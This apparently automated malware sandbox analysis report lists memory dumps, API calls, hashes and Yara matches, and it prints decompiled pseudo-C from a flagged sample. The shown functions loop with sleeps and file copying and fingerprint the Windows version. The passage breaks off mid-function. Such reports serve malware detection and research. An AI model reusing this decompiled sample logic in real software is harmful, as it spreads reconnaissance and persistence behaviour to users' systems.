                                    • Instruction ID: 5d6a148b29aed9c92f876fc96f070a3fb74a217887bb67d1e9c0f1fe2844cb5b
                                    • Opcode Fuzzy Hash: b407bbee38ace09f39b99b1c90f003e113612ee676480262dca8026249e0784f
                                    • Instruction Fuzzy Hash: 07B002A5510500DA9A95EF9CC844F1662EDF79D2547805550B208D7245C52DA8809B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05480026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622960310.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b8d3c833eb8a0df8985675654c6a98f2dea0f6e466488346a01fc5083a12c31e
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: C4E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 056D0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623337384.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: e67c8e9db4b672b29217280454e72ba266b5c62ec969a0ac72a6ffa0c87c8daf
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 00E09A74D00608EFCB04CF99C44888DFBB5AF48320F20C291E825973A5D7309E41DA40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 00CD0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.603661604.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 14e0cf5fc89cc668bb7152b6a8e276f69238124deedeb21018dec0e9765ca0bb
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 86E09A74D00608EFCB04CF99C44898DBBB5AF48320F20C291E825973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 055E0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623199637.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 1c0f57349416764f38f1c2c9f4adfdc46b41274df4e991acfcaa483f6baa28a6
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 5EE00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 058B0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623680627.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: c7029126856fc18a90b10eb8f6b66cf6dfe98ba5d5677cc42749acb8f4f96d87
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 61E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04F60026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621483040.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b270842f4330b665a0ae8cb82e5050ebe7dadf3c51feb8eedbf0113eeaff8a57
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: C5E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 057C0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623511727.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 9fc836f22d5adc3682a85b8cd94ac9b694d140d122a19206f8b3beb58260fd7d
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 72E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05570026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623129523.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: ae8fc1ac821e2202df0b9a1dd35f99cc18617dab889f93737cbe80bdb9692bf0
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 3FE00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419E80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04E40026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620641863.0000000004E40000.00000040.00000001.sdmp, Offset: 04E40000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 7858acfb835fe4669736da2537f612504c283f7e3ab97eaad4bede2a604049da
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 65E00A74D04608EFCB04DF99C54889DBBB5AF89320B25C295E965973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 052A0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622491432.00000000052A0000.00000040.00000001.sdmp, Offset: 052A0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b008bcd4173c86d40940a7d5f4970cc7f54954a8cb8f0e9b94efed51c1aa89e6
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 6AE09A74D00608EFCB04CF99C44889DFBB5AF48320B20C291E825973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E24011308(void* __eax) {
                                    				signed int _t2;
                                    				void* _t4;
                                    				signed int _t5;
                                    
                                    				_t2 =  *0x2405704c; // 0x0
                                    				_t4 =  *0x2405b59c; // 0x3380000
                                    				_t5 = HeapFree(_t4, _t2 & 0x00000001, __eax); // executed
                                    				asm("sbb eax, eax");
                                    				return  ~_t5 & 0x0000007f;
                                    			}

                                    APIs
                                    • HeapFree.KERNEL32(03380000,00000000), ref: 2401131B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: f0c06279d0b994ed06d1c024c4a25fd67197e3b5f152ea92e99a30f4722968e4
                                    • Instruction ID: 6c08dce1daa82f61513e78823dc41ea4d7efafefdee2a7e001a5c237e3fa9e19
                                    • Opcode Fuzzy Hash: f0c06279d0b994ed06d1c024c4a25fd67197e3b5f152ea92e99a30f4722968e4
                                    • Instruction Fuzzy Hash: FBC08CF32206019B8F108BECCCC2E1762DCF31C2087106420F50CDB101C12EE8C09620
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2405251C() {
                                    				signed int* _t5;
                                    				void* _t8;
                                    				void* _t11;
                                    				void* _t12;
                                    
                                    				E24013088(0x2405aaa8);
                                    				E240178C8(E24052464, 0, 0);
                                    				L1:
                                    				_t5 =  *0x2405ab7c; // 0x2405b930
                                    				Sleep( *_t5 * 0xea60); // executed
                                    				E240500AC(_t8, 0, _t11, _t12);
                                    				goto L1;
                                    			}

                                    APIs
                                      • Part of subcall function 240178C8: CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                      • Part of subcall function 240178C8: SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    • Sleep.KERNEL32(2405B930), ref: 24052540
                                      • Part of subcall function 240500AC: GetTickCount.KERNEL32 ref: 24050124
                                      • Part of subcall function 240500AC: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24050162
                                      • Part of subcall function 240500AC: SetFileAttributesA.KERNEL32(00000000,00000080,.txt,?,00000000,00000000,?,00000000,240502D7,?,?,00000000,00000000), ref: 2405016D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileThread$AttributesCopyCountCreatePrioritySleepTick
                                    • String ID:
                                    • API String ID: 696888678-0
                                    • Opcode ID: bd4957d9d874c1714997d2d643c2542b0f38b3c574f5fdb879ee39a40b270e59
                                    • Instruction ID: b1ffadd8d17362f08309d5e16d3babc1e98b1cac085926286dd779b12b47022f
                                    • Opcode Fuzzy Hash: bd4957d9d874c1714997d2d643c2542b0f38b3c574f5fdb879ee39a40b270e59
                                    • Instruction Fuzzy Hash: 93D0C920B4420056B60EEB79949080D2685FFAA10C705D85D6405AE068C978E9C58E22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.624058360.0000000005A80000.00000040.00000001.sdmp, Offset: 05A80000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                    • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                                    • Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                    • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 94%
                                    			E2401F870(char* __eax, void* __ebx, char __edi, void* __esi) {
                                    				char _v8;
                                    				struct _SYSTEM_INFO _v44;
                                    				char _v46;
                                    				signed int _v47;
                                    				signed int _v48;
                                    				signed int _v50;
                                    				signed int _v52;
                                    				short _v306;
                                    				struct _OSVERSIONINFOW _v328;
                                    				char _v332;
                                    				char _v336;
                                    				char* _v340;
                                    				char _v344;
                                    				char _v348;
                                    				void* _v352;
                                    				void* _v356;
                                    				void* _v360;
                                    				void* _v364;
                                    				void* _v368;
                                    				void* _v372;
                                    				void* _v376;
                                    				void* _v380;
                                    				void* _v384;
                                    				char _v388;
                                    				char _v392;
                                    				char _v396;
                                    				char _v400;
                                    				void* _v404;
                                    				void* _v408;
                                    				void* _v412;
                                    				void* _v416;
                                    				void* _v420;
                                    				void* _v424;
                                    				void* _v428;
                                    				char _v432;
                                    				char _v436;
                                    				char _v440;
                                    				char _v444;
                                    				char _v448;
                                    				char _v452;
                                    				char _t402;
                                    				void* _t405;
                                    				intOrPtr _t414;
                                    				signed int _t460;
                                    				intOrPtr _t484;
                                    				intOrPtr _t491;
                                    				char _t522;
                                    				void* _t523;
                                    				intOrPtr _t540;
                                    				char* _t586;
                                    				intOrPtr _t588;
                                    				intOrPtr _t589;
                                    				void* _t598;
                                    
                                    				_t584 = __edi;
                                    				_t588 = _t589;
                                    				_t523 = 0x38;
                                    				goto L1;
                                    				L5:
                                    				if(_v328.dwOSVersionInfoSize == 0) {
                                    					L123:
                                    					_v348 =  *(_t586 + 0x20);
                                    					_v344 = 0;
                                    					_v340 =  *(_t586 + 0x24);
                                    					_v336 = 0;
                                    					E24015C78(0x24020b24, _t522, 1,  &_v348, _t584, _t586,  &_v444);
                                    					E240130DC(_t586 + 0xc, _v444);
                                    					_v348 =  *(_t586 + 8);
                                    					_v344 = 0xb;
                                    					_v340 =  *((intOrPtr*)(_t586 + 0x18));
                                    					_v336 = 0;
                                    					E24015C78("%s (Build: %d", _t522, 1,  &_v348, _t584, _t586,  &_v448);
                                    					E240130DC(_t586 + 4, _v448);
                                    					if( *(_t586 + 0x20) != 0) {
                                    						_v440 =  *(_t586 + 0xc);
                                    						_v436 = 0xb;
                                    						E24015C78(" - Service Pack: %s", _t522, 0,  &_v440, _t584, _t586,  &_v452);
                                    						E24013344(_t586 + 4, _v452);
                                    					}
                                    					E24013344(_t586 + 4, 0x24020b68);
                                    					_pop(_t540);
                                    					 *[fs:eax] = _t540;
                                    					_push(0x240205d7);
                                    					E240130AC( &_v452, 3);
                                    					E240130AC( &_v432, 0x15);
                                    					return E24013088( &_v332);
                                    				} else {
                                    					 *(_t586 + 0x10) = _v328.dwMajorVersion;
                                    					 *((intOrPtr*)(_t586 + 0x14)) = _v328.dwMinorVersion;
                                    					 *((intOrPtr*)(_t586 + 0x18)) = _v328.dwBuildNumber;
                                    					if(_v328.dwPlatformId != 2 || _v46 == 1) {
                                    						_t402 = 0;
                                    					} else {
                                    						_t402 = 1;
                                    					}
                                    					 *_t586 = _t402;
                                    					if(_t522 != 0) {
                                    						 *(_t586 + 0x20) = _v52 & 0x0000ffff;
                                    						 *(_t586 + 0x24) = _v50 & 0x0000ffff;
                                    					}
                                    					GetSystemInfo( &_v44);
                                    					_t584 = _v328.dwPlatformId;
                                    					_t405 = _t584 - 1;
                                    					_t598 = _t405;
                                    					if(_t598 < 0) {
                                    						E240130DC(_t586 + 8, "Windows 3.1");
                                    						goto L123;
                                    					} else {
                                    						if(_t598 == 0) {
                                    							if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0) {
                                    								if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0xa || _v306 != 0x41) {
                                    									if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0xa) {
                                    										if( *(_t586 + 0x10) == 4 &&  *((intOrPtr*)(_t586 + 0x14)) == 0x5a) {
                                    											E240130DC(_t586 + 8, "Windows ME");
                                    										}
                                    									} else {
                                    										E240130DC(_t586 + 8, "Windows 98");
                                    									}
                                    								} else {
                                    									E240130DC(_t586 + 8, "Windows 98 SE");
                                    								}
                                    							} else {
                                    								_t414 = _v306;
                                    								if(_t414 == 0x43 || _t414 == 0x42) {
                                    									E240130DC(_t586 + 8, "Windows 95 (Release 2)");
                                    								} else {
                                    									E240130DC(_t586 + 8, "Windows 95");
                                    								}
                                    							}
                                    							goto L123;
                                    						}
                                    						if(_t405 == 1) {
                                    							if(_v46 != 1) {
                                    								if(_v328.dwMajorVersion != 6 || _v328.dwMinorVersion != 0) {
                                    									if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 2) {
                                    										if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 2) {
                                    											if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 0) {
                                    												if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
                                    													if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
                                    														if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
                                    															E240130DC(_t586 + 8, "Windows NT 4.0 Server");
                                    														} else {
                                    															E240130DC(_t586 + 8, "Windows NT 4.0 Server Web Edition");
                                    														}
                                    													} else {
                                    														E240130DC(_t586 + 8, "Windows NT 4.0 Server Enterprise");
                                    													}
                                    												} else {
                                    													E240130DC(_t586 + 8, "Windows NT 4.0 Server Datacenter");
                                    												}
                                    											} else {
                                    												if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
                                    													if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
                                    														if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
                                    															E240130DC(_t586 + 8, "Windows 2000 Server");
                                    														} else {
                                    															E240130DC(_t586 + 8, "Windows 2000 Server Web Edition");
                                    														}
                                    													} else {
                                    														E240130DC(_t586 + 8, "Windows 2000 Server Enterprise");
                                    													}
                                    												} else {
                                    													E240130DC(_t586 + 8, "Windows 2000 Server Datacenter");
                                    												}
                                    											}
                                    										} else {
                                    											if(_t522 == 0 || _v48 != 0x8000) {
                                    												if(GetSystemMetrics(0x59) == 0) {
                                    													E240130DC(_t586 + 8, "Windows 2003 Server (Release 2)");
                                    												} else {
                                    													E240130DC(_t586 + 8, "Windows 2003 Server");
                                    												}
                                    											} else {
                                    												E240130DC(_t586 + 8, "Windows Home Server");
                                    											}
                                    										}
                                    									} else {
                                    										if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
                                    											if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
                                    												if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
                                    													E240130DC(_t586 + 8, "Windows 2003 Server");
                                    												} else {
                                    													E240130DC(_t586 + 8, "Windows 2003 Server Web Edition");
                                    												}
                                    											} else {
                                    												E240130DC(_t586 + 8, "Windows 2003 Server Enterprise");
                                    											}
                                    										} else {
                                    											E240130DC(_t586 + 8, "Windows 2003 Server Datacenter");
                                    										}
                                    									}
                                    									goto L123;
                                    								} else {
                                    									E240130DC(_t586 + 8, "Windows 2008");
                                    									if( *0x24057124 == 0) {
                                    										goto L123;
                                    									}
                                    									 *0x24057124(_v328.dwMajorVersion, _v328.dwMinorVersion, _v52 & 0x0000ffff, _v50 & 0x0000ffff,  &_v8);
                                    									_t460 = _v8 + 0xfffffff9;
                                    									if(_t460 > 0xa) {
                                    										L79:
                                    										E24013344(_t586 + 8, " Server (unknown edition)");
                                    										goto L123;
                                    									}
                                    									switch( *((intOrPtr*)(_t460 * 4 +  &M24020016))) {
                                    										case 0:
                                    											_v348 =  *(_t586 + 8);
                                    											_v344 = 0xb;
                                    											_v340 = "Standard";
                                    											_v336 = 0xb;
                                    											E24015C78("%s %s Server", _t522, 1,  &_v348, _t584, _t586,  &_v400);
                                    											E240130DC(_t586 + 8, _v400);
                                    											goto L123;
                                    										case 1:
                                    											 &_v404 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Datacenter";
                                    											_v340 = "Datacenter";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v404);
                                    											__edx = _v404;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 2:
                                    											goto L79;
                                    										case 3:
                                    											 &_v408 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Enterprise";
                                    											_v340 = "Enterprise";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v408);
                                    											__edx = _v408;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 4:
                                    											 &_v412 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Datacenter";
                                    											_v340 = "Datacenter";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v412);
                                    											__edx = _v412;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 5:
                                    											 &_v416 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Standard";
                                    											_v340 = "Standard";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v416);
                                    											__edx = _v416;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 6:
                                    											 &_v420 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Enterprise";
                                    											_v340 = "Enterprise";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v420);
                                    											__edx = _v420;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 7:
                                    											 &_v424 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = "Enterprise IA64";
                                    											_v340 = "Enterprise IA64";
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v424);
                                    											__edx = _v424;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    										case 8:
                                    											 &_v428 =  *(__esi + 8);
                                    											_v348 =  *(__esi + 8);
                                    											_v344 = 0xb;
                                    											__eax = 0x240208c0;
                                    											_v340 = 0x240208c0;
                                    											_v336 = 0xb;
                                    											__edx =  &_v348;
                                    											__ecx = 1;
                                    											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v428);
                                    											__edx = _v428;
                                    											__eax = __esi + 8;
                                    											__eax = E240130DC(__esi + 8, __edx);
                                    											goto L123;
                                    									}
                                    								}
                                    							}
                                    							_t584 = _v328.dwMajorVersion;
                                    							if(_t584 != 6) {
                                    								if(_t584 != 5) {
                                    									_v348 = _t584;
                                    									_v344 = 0;
                                    									_v340 = _v328.dwMinorVersion;
                                    									_v336 = 0;
                                    									E24015C78("Windows NT %d.%d", _t522, 1,  &_v348, _t584, _t586,  &_v396);
                                    									E240130DC(_t586 + 8, _v396);
                                    								} else {
                                    									if(_v328.dwMinorVersion != 2 || _v44.dwOemId != 9) {
                                    										if(_t522 == 0 || (_v47 & 0x00000002) == 0 || _v328.dwMinorVersion != 1) {
                                    											if(_v328.dwMinorVersion != 1) {
                                    												E240130DC(_t586 + 8, "Windows 2000 Professional");
                                    											} else {
                                    												E240130DC(_t586 + 8, "Windows XP Professional");
                                    											}
                                    										} else {
                                    											E240130DC(_t586 + 8, "Windows XP Home");
                                    										}
                                    									} else {
                                    										E240130DC(_t586 + 8, "Windows XP Professional x64");
                                    									}
                                    								}
                                    								goto L123;
                                    							}
                                    							_t484 = _v328.dwMinorVersion;
                                    							if(_t484 != 1) {
                                    								if(_t484 == 0) {
                                    									E240130DC(_t586 + 8, "Windows Vista");
                                    								}
                                    							} else {
                                    								E240130DC(_t586 + 8, "Windows 7");
                                    							}
                                    							if( *0x24057124 == 0) {
                                    								goto L123;
                                    							} else {
                                    								 *0x24057124(_v328.dwMajorVersion, _v328.dwMinorVersion, _v52 & 0x0000ffff, _v50 & 0x0000ffff,  &_v8);
                                    								_t491 = _v8;
                                    								if(_t491 > 0x1c) {
                                    									L53:
                                    									_v348 =  *(_t586 + 8);
                                    									_v344 = 0xb;
                                    									_v340 = "(unknown edition)";
                                    									_v336 = 0xb;
                                    									E24015C78(0x240206c0, _t522, 1,  &_v348, _t584, _t586,  &_v392);
                                    									E240130DC(_t586 + 8, _v392);
                                    									goto L123;
                                    								}
                                    								switch( *((intOrPtr*)( *(_t491 + 0x2401fac9) * 4 +  &M2401FAE6))) {
                                    									case 0:
                                    										goto L53;
                                    									case 1:
                                    										_v348 =  *(_t586 + 8);
                                    										_v344 = 0xb;
                                    										_v340 = "Ultimate";
                                    										_v336 = 0xb;
                                    										E24015C78(0x240206c0, _t522, 1,  &_v348, _t584, _t586,  &_v332);
                                    										E240130DC(_t586 + 8, _v332);
                                    										goto L123;
                                    									case 2:
                                    										 &_v352 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Home Basic";
                                    										_v340 = "Home Basic";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v352);
                                    										__edx = _v352;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 3:
                                    										 &_v356 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Premium";
                                    										_v340 = "Premium";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v356);
                                    										__edx = _v356;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 4:
                                    										 &_v360 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Enterprise";
                                    										_v340 = "Enterprise";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v360);
                                    										__edx = _v360;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 5:
                                    										 &_v364 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Home Basic N";
                                    										_v340 = "Home Basic N";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v364);
                                    										__edx = _v364;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 6:
                                    										 &_v368 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Business";
                                    										_v340 = "Business";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v368);
                                    										__edx = _v368;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 7:
                                    										 &_v372 =  *(__esi + 8);
